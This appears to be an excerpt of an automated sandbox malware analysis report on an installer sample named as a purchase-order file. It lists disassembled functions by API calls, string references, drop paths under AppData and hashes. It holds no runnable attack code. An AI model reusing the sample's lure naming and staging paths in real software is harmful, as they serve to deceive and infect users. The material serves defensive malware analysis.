                                                        • Opcode Fuzzy Hash: 1b443bf0d727d57298d8857cd11a567a68dfce872be13232ccc9a2637e56550a
                                                        • Instruction Fuzzy Hash: ABD05E73B10100DBD720EBB8BAC445E77E8EB803263318837E402E2091E679C8424628
                                                        APIs
                                                        • GetDlgItem.USER32(?,000003FB), ref: 00404626
                                                        • SetWindowTextA.USER32(00000000,?), ref: 00404650
                                                        • SHBrowseForFolderA.SHELL32(?,00420100,?), ref: 00404701
                                                        • CoTaskMemFree.OLE32(00000000), ref: 0040470C
                                                        • lstrcmpiA.KERNEL32(Exec,Ramplor Setup: Installing), ref: 0040473E
                                                        • lstrcatA.KERNEL32(?,Exec), ref: 0040474A
                                                        • SetDlgItemTextA.USER32(?,000003FB,?), ref: 0040475C
                                                          • Part of subcall function 004057C1: GetDlgItemTextA.USER32(?,?,00000400,00404793), ref: 004057D4
                                                          • Part of subcall function 0040639C: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\PO2737478834ORDER.exe",774D3410,C:\Users\user\AppData\Local\Temp\,00000000,004032ED,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403524,?,00000007,00000009,0000000B), ref: 004063F4
                                                          • Part of subcall function 0040639C: CharNextA.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 00406401
                                                          • Part of subcall function 0040639C: CharNextA.USER32(?,"C:\Users\user\Desktop\PO2737478834ORDER.exe",774D3410,C:\Users\user\AppData\Local\Temp\,00000000,004032ED,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403524,?,00000007,00000009,0000000B), ref: 00406406
                                                          • Part of subcall function 0040639C: CharPrevA.USER32(?,?,774D3410,C:\Users\user\AppData\Local\Temp\,00000000,004032ED,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403524,?,00000007,00000009,0000000B), ref: 00406416
                                                        • GetDiskFreeSpaceA.KERNEL32(0041FCF8,?,?,0000040F,?,0041FCF8,0041FCF8,?,00000001,0041FCF8,?,?,000003FB,?), ref: 0040481A
                                                        • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404835
                                                          • Part of subcall function 0040498E: lstrlenA.KERNEL32(Ramplor Setup: Installing,Ramplor Setup: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004048A9,000000DF,00000000,00000400,?), ref: 00404A2C
                                                          • Part of subcall function 0040498E: wsprintfA.USER32 ref: 00404A34
                                                          • Part of subcall function 0040498E: SetDlgItemTextA.USER32(?,Ramplor Setup: Installing), ref: 00404A47
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1267094890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1267026802.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267148028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO2737478834ORDER.jbxd
                                                        Similarity
                                                        • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                        • String ID: A$C:\Users\user\AppData\Roaming\Grydeskeen146\sdfdsf$Exec$Ramplor Setup: Installing
                                                        • API String ID: 2624150263-1069141300
                                                        • Opcode ID: e6e408a563ecea602c0a6dfa5c805507a5dd8bebb4c2c52a138c8c5013cba04b
                                                        • Instruction ID: 23887ea06715a98946f15fa8ab5ee03a9679ba0c83a6df36e4e3dfda0b9dc378
                                                        • Opcode Fuzzy Hash: e6e408a563ecea602c0a6dfa5c805507a5dd8bebb4c2c52a138c8c5013cba04b
                                                        • Instruction Fuzzy Hash: C9A183B1900209ABDB11EFA5CD85AAFB7B8EF85314F10843BF601B72D1D77C89418B69
                                                        APIs
                                                        • CoCreateInstance.OLE32(00408418,?,00000001,00408408,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021F0
                                                        • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00408408,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004022A2
                                                        Strings
                                                        • C:\Users\user\AppData\Roaming\Grydeskeen146\sdfdsf\Berni72, xrefs: 00402230
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1267094890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1267026802.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267148028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO2737478834ORDER.jbxd
                                                        Similarity
                                                        • API ID: ByteCharCreateInstanceMultiWide
                                                        • String ID: C:\Users\user\AppData\Roaming\Grydeskeen146\sdfdsf\Berni72
                                                        • API String ID: 123533781-1706942283
                                                        • Opcode ID: 337e50965008046281696298112d8d2f7bd2d47ffe4874b4a08d180513f81c13
                                                        • Instruction ID: 1d5fc0eda79a0a672284adf98007a832727f4b93af1a8b9a4894ceaf33dc30f5
                                                        • Opcode Fuzzy Hash: 337e50965008046281696298112d8d2f7bd2d47ffe4874b4a08d180513f81c13
                                                        • Instruction Fuzzy Hash: 45510471A00208AFCB00DFE4CA88A9D7BB6EF48314F2041BAF515EB2D1DA799981CB54
                                                        APIs
                                                        • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 004027B0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1267094890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1267026802.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267148028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO2737478834ORDER.jbxd
                                                        Similarity
                                                        • API ID: FileFindFirst
                                                        • String ID:
                                                        • API String ID: 1974802433-0
                                                        • Opcode ID: 2052ac60e94b4b2aee6d5db1d937540094f6649242f4bec3cf668b4a6a1e6f36
                                                        • Instruction ID: 13e9d4e2be50c596067d6900ef2af7155ed35788a2bbd6a4100e2a10f5e5ac7a
                                                        • Opcode Fuzzy Hash: 2052ac60e94b4b2aee6d5db1d937540094f6649242f4bec3cf668b4a6a1e6f36
                                                        • Instruction Fuzzy Hash: 0AF0A771604110DFD710EB649949AEE77A8DF51314F20057BF112B20C2D7B889469B2A
                                                        APIs
                                                        • GetDlgItem.USER32(?,000003F9), ref: 00404B61
                                                        • GetDlgItem.USER32(?,00000408), ref: 00404B6E
                                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 00404BBD
                                                        • LoadImageA.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404BD4
                                                        • SetWindowLongA.USER32(?,000000FC,0040515C), ref: 00404BEE
                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404C00
                                                        • ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404C14
                                                        • SendMessageA.USER32(?,00001109,00000002), ref: 00404C2A
                                                        • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404C36
                                                        • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404C46
                                                        • DeleteObject.GDI32(00000110), ref: 00404C4B
                                                        • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404C76
                                                        • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404C82
                                                        • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404D1C
                                                        • SendMessageA.USER32(?,0000110A,00000003,00000110), ref: 00404D4C
                                                          • Part of subcall function 0040417A: SendMessageA.USER32(00000028,?,00000001,00403FAA), ref: 00404188
                                                        • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404D60
                                                        • GetWindowLongA.USER32(?,000000F0), ref: 00404D8E
                                                        • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404D9C
                                                        • ShowWindow.USER32(?,00000005), ref: 00404DAC
                                                        • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404EA7
                                                        • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404F0C
                                                        • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404F21
                                                        • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404F45
                                                        • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404F65
                                                        • ImageList_Destroy.COMCTL32(00000000), ref: 00404F7A
                                                        • GlobalFree.KERNEL32(00000000), ref: 00404F8A
                                                        • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00405003
                                                        • SendMessageA.USER32(?,00001102,?,?), ref: 004050AC
                                                        • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 004050BB
                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 004050E5
                                                        • ShowWindow.USER32(?,00000000), ref: 00405133
                                                        • GetDlgItem.USER32(?,000003FE), ref: 0040513E
                                                        • ShowWindow.USER32(00000000), ref: 00405145
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1267094890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1267026802.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267148028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO2737478834ORDER.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                        • String ID: $M$N
                                                        • API String ID: 2564846305-813528018
                                                        • Opcode ID: 978ecd055ebf43ea6b523d6689dc18b759a0b0fdc29e4d3947c73573fc9385a9
                                                        • Instruction ID: 035ac8a7469eee7f523ea9a41678d20bac9593c5f5e0b875cc373c12e4cd4a79
                                                        • Opcode Fuzzy Hash: 978ecd055ebf43ea6b523d6689dc18b759a0b0fdc29e4d3947c73573fc9385a9
                                                        • Instruction Fuzzy Hash: 63025DB0A00209AFDF209F94DD45AAE7BB5FB84354F50813AF610BA2E1D7799D42CF58
                                                        APIs
                                                        • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 0040433B
                                                        • GetDlgItem.USER32(00000000,000003E8), ref: 0040434F
                                                        • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 0040436D
                                                        • GetSysColor.USER32(?), ref: 0040437E
                                                        • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 0040438D
                                                        • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 0040439C
                                                        • lstrlenA.KERNEL32(?), ref: 0040439F
                                                        • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004043AE
                                                        • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004043C3
                                                        • GetDlgItem.USER32(?,0000040A), ref: 00404425
                                                        • SendMessageA.USER32(00000000), ref: 00404428
                                                        • GetDlgItem.USER32(?,000003E8), ref: 00404453
                                                        • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404493
                                                        • LoadCursorA.USER32(00000000,00007F02), ref: 004044A2
                                                        • SetCursor.USER32(00000000), ref: 004044AB
                                                        • LoadCursorA.USER32(00000000,00007F00), ref: 004044C1
                                                        • SetCursor.USER32(00000000), ref: 004044C4
                                                        • SendMessageA.USER32(00000111,00000001,00000000), ref: 004044F0
                                                        • SendMessageA.USER32(00000010,00000000,00000000), ref: 00404504
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1267094890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1267026802.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267148028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO2737478834ORDER.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                        • String ID: Exec$N${B@
                                                        • API String ID: 3103080414-1252937535
                                                        • Opcode ID: acb20318001dbc993e8a8a4388a34ea8f8254a099665a8e39094a0f64cc29e55
                                                        • Instruction ID: c600905809f0113b99b24623cb0d1ad186d6442f8c09b0c76a4ffb62e5d10872
                                                        • Opcode Fuzzy Hash: acb20318001dbc993e8a8a4388a34ea8f8254a099665a8e39094a0f64cc29e55
                                                        • Instruction Fuzzy Hash: 5661C7B1A00209BFEB109F60CD45F6A7B69FB84714F10813AFB057A1D1C7B89951CF98
                                                        APIs
                                                        • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                        • BeginPaint.USER32(?,?), ref: 00401047
                                                        • GetClientRect.USER32(?,?), ref: 0040105B
                                                        • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                        • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                        • DeleteObject.GDI32(?), ref: 004010ED
                                                        • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                        • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                        • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                        • SelectObject.GDI32(00000000,?), ref: 00401140
                                                        • DrawTextA.USER32(00000000,00423F20,000000FF,00000010,00000820), ref: 00401156
                                                        • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                        • DeleteObject.GDI32(?), ref: 00401165
                                                        • EndPaint.USER32(?,?), ref: 0040116E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1267094890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1267026802.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267148028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO2737478834ORDER.jbxd
                                                        Similarity
                                                        • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                        • String ID: F
                                                        • API String ID: 941294808-1304234792
                                                        • Opcode ID: 927d9f4f17401607196459c248a51bb8bdb5d1fd0febad51b1ec1e4e61243643
                                                        • Instruction ID: f39fc87f540bacaa9a77f224585c2e26811c2c777a6195e868dd16c74e67a44d
                                                        • Opcode Fuzzy Hash: 927d9f4f17401607196459c248a51bb8bdb5d1fd0febad51b1ec1e4e61243643
                                                        • Instruction Fuzzy Hash: AA419D71800209AFCF058FA5DE459AF7FB9FF45315F00802AF591AA1A0CB34DA55DFA4
                                                        APIs
                                                        • GetCommandLineA.KERNEL32(00000400), ref: 700D19D4
                                                        • lstrcpynA.KERNEL32(?,00000000), ref: 700D19E2
                                                        • CharNextA.USER32(00000022), ref: 700D1A0F
                                                        • CharNextA.USER32(00000022), ref: 700D1A18
                                                        • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000044,?), ref: 700D1A39
                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 700D1A4B
                                                        • GetExitCodeProcess.KERNEL32(?,?), ref: 700D1A58
                                                        • CloseHandle.KERNEL32(?), ref: 700D1A67
                                                        • CloseHandle.KERNEL32(?), ref: 700D1A6C
                                                        • ExitProcess.KERNEL32 ref: 700D1A71
                                                        • ExitProcess.KERNEL32 ref: 700D1A7C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1269455905.00000000700D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 700D0000, based on PE: true
                                                        • Associated: 00000000.00000002.1269440399.00000000700D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000000.00000002.1269485100.00000000700D2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000000.00000002.1269504555.00000000700D3000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000000.00000002.1269540924.00000000700D4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_700d0000_PO2737478834ORDER.jbxd
                                                        Similarity
                                                        • API ID: Process$Exit$CharCloseHandleNext$CodeCommandCreateLineObjectSingleWaitlstrcpyn
                                                        • String ID: "$"$D
                                                        • API String ID: 3771911414-3923985841
                                                        • Opcode ID: abc46fd903f35db9e03bc0875f28f996097bed2a17998bec26246f47d5fd381b
                                                        • Instruction ID: 8c5f5018f3cfa21e7bfe692f2a6a173f7a4eb121f24b8e77fc1c82022c369a67
                                                        • Opcode Fuzzy Hash: abc46fd903f35db9e03bc0875f28f996097bed2a17998bec26246f47d5fd381b
                                                        • Instruction Fuzzy Hash: 862162B280024CBFEB119BF5CC48BEE7FBA9B04321F504055E641A2262C6701D49CB71
                                                        APIs
                                                        • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00405EC1,?,?), ref: 00405D61
                                                        • GetShortPathNameA.KERNEL32(?,00422AB8,00000400), ref: 00405D6A
                                                          • Part of subcall function 00405BBF: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E1A,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BCF
                                                          • Part of subcall function 00405BBF: lstrlenA.KERNEL32(00000000,?,00000000,00405E1A,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C01
                                                        • GetShortPathNameA.KERNEL32(?,00422EB8,00000400), ref: 00405D87
                                                        • wsprintfA.USER32 ref: 00405DA5
                                                        • GetFileSize.KERNEL32(00000000,00000000,00422EB8,C0000000,00000004,00422EB8,?,?,?,?,?), ref: 00405DE0
                                                        • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405DEF
                                                        • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E27
                                                        • SetFilePointer.KERNEL32(0040A3D8,00000000,00000000,00000000,00000000,004226B8,00000000,-0000000A,0040A3D8,00000000,[Rename],00000000,00000000,00000000), ref: 00405E7D
                                                        • GlobalFree.KERNEL32(00000000), ref: 00405E8E
                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405E95
                                                          • Part of subcall function 00405C5A: GetFileAttributesA.KERNELBASE(00000003,00402EE1,C:\Users\user\Desktop\PO2737478834ORDER.exe,80000000,00000003), ref: 00405C5E
                                                          • Part of subcall function 00405C5A: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405C80
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1267094890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1267026802.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267148028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO2737478834ORDER.jbxd
                                                        Similarity
                                                        • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                        • String ID: %s=%s$[Rename]
                                                        • API String ID: 2171350718-1727408572
                                                        • Opcode ID: 58e7088ff9b5cc87adf318d52b3a35de943ed58b69230702f7486ba729a2ba76
                                                        • Instruction ID: e2b4b59c5115c054d9977882ffa936deea793db07019febf4a6c543227337bd7
                                                        • Opcode Fuzzy Hash: 58e7088ff9b5cc87adf318d52b3a35de943ed58b69230702f7486ba729a2ba76
                                                        • Instruction Fuzzy Hash: 39312431205B15BBD2207B65AD48F6B3A5CDF45754F14003BFA85F62C2DBBCE9028AAD
                                                        APIs
                                                        • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\PO2737478834ORDER.exe",774D3410,C:\Users\user\AppData\Local\Temp\,00000000,004032ED,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403524,?,00000007,00000009,0000000B), ref: 004063F4
                                                        • CharNextA.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 00406401
                                                        • CharNextA.USER32(?,"C:\Users\user\Desktop\PO2737478834ORDER.exe",774D3410,C:\Users\user\AppData\Local\Temp\,00000000,004032ED,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403524,?,00000007,00000009,0000000B), ref: 00406406
                                                        • CharPrevA.USER32(?,?,774D3410,C:\Users\user\AppData\Local\Temp\,00000000,004032ED,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403524,?,00000007,00000009,0000000B), ref: 00406416
                                                        Strings
                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 0040639D
                                                        • "C:\Users\user\Desktop\PO2737478834ORDER.exe", xrefs: 004063D8
                                                        • *?|<>/":, xrefs: 004063E4
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1267094890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1267026802.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267148028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
